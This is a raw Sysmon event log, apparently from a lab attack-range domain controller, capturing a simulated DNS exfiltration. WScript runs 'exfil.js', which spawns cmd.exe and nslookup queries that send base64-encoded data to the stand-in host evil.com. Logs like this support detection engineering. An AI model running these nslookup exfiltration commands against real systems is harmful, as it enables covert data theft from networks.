14:16:36.895{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201885Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.895{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201884Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.895{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201883Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.895{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C4-629A-0941-000000005F02}4624C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201882Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.895{2E1864BB-17C4-629A-0741-000000005F02}23884552C:\Windows\system32\cmd.exe{2E1864BB-17C4-629A-0941-000000005F02}4624C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201881Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.898{2E1864BB-17C4-629A-0941-000000005F02}4624C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C4-629A-0741-000000005F02}2388C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgiu.tmp 2>&1 10341000x8000000000000000201880Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.863{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17C4-629A-0841-000000005F02}7144C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201879Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.863{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C4-629A-0841-000000005F02}7144C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201878Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.847{2E1864BB-17C4-629A-0841-000000005F02}71447536C:\Windows\system32\conhost.exe{2E1864BB-17C4-629A-0741-000000005F02}2388C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201877Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.831{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C4-629A-0841-000000005F02}7144C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201876Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.831{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201875Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.831{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201874Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.831{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201873Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.831{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201872Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.831{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C4-629A-0741-000000005F02}2388C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201871Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.831{2E1864BB-17A1-629A-783D-000000005F02}55525124C:\Windows\System32\WScript.exe{2E1864BB-17C4-629A-0741-000000005F02}2388C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201870Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.838{2E1864BB-17C4-629A-0741-000000005F02}2388C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgiu.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000201869Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.831{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlelyox.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 22542200x8000000000000000201868Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.540{00000000-0000-0000-0000-000000000000}4860evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000201867Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.792{2E1864BB-17C4-629A-0541-000000005F02}21286160C:\Windows\system32\conhost.exe{2E1864BB-17C4-629A-0641-000000005F02}7236C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x8000000000000000201866Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.418{00000000-0000-0000-0000-000000000000}5620evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000201865Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.777{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x8000000000000000201864Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.313{00000000-0000-0000-0000-000000000000}5624evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000201863Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.225{00000000-0000-0000-0000-000000000000}2068evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000201862Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.777{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x8000000000000000201861Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.039{00000000-0000-0000-0000-000000000000}7328evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000201860Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.899{00000000-0000-0000-0000-000000000000}2256evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000201859Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.751{00000000-0000-0000-0000-000000000000}5960evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000201858Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.567{00000000-0000-0000-0000-000000000000}5516evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000201857Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.420{00000000-0000-0000-0000-000000000000}1648evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000201856Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.777{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x8000000000000000201855Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.315{00000000-0000-0000-0000-000000000000}2192evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000201854Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.777{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x8000000000000000201853Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.230{00000000-0000-0000-0000-000000000000}7084evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000201852Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.777{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C4-629A-0641-000000005F02}7236C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 22542200x8000000000000000201851Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.145{00000000-0000-0000-0000-000000000000}1788evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000201850Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.777{2E1864BB-17C4-629A-0441-000000005F02}74084572C:\Windows\system32\cmd.exe{2E1864BB-17C4-629A-0641-000000005F02}7236C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201849Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.789{2E1864BB-17C4-629A-0641-000000005F02}7236C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C4-629A-0441-000000005F02}7408C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlelyox.tmp 2>&1 10341000x8000000000000000201848Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.761{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17C4-629A-0541-000000005F02}2128C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201847Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.761{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C4-629A-0541-000000005F02}2128C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201846Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.761{2E1864BB-17C4-629A-0541-000000005F02}21286160C:\Windows\system32\conhost.exe{2E1864BB-17C4-629A-0441-000000005F02}7408C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201845Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 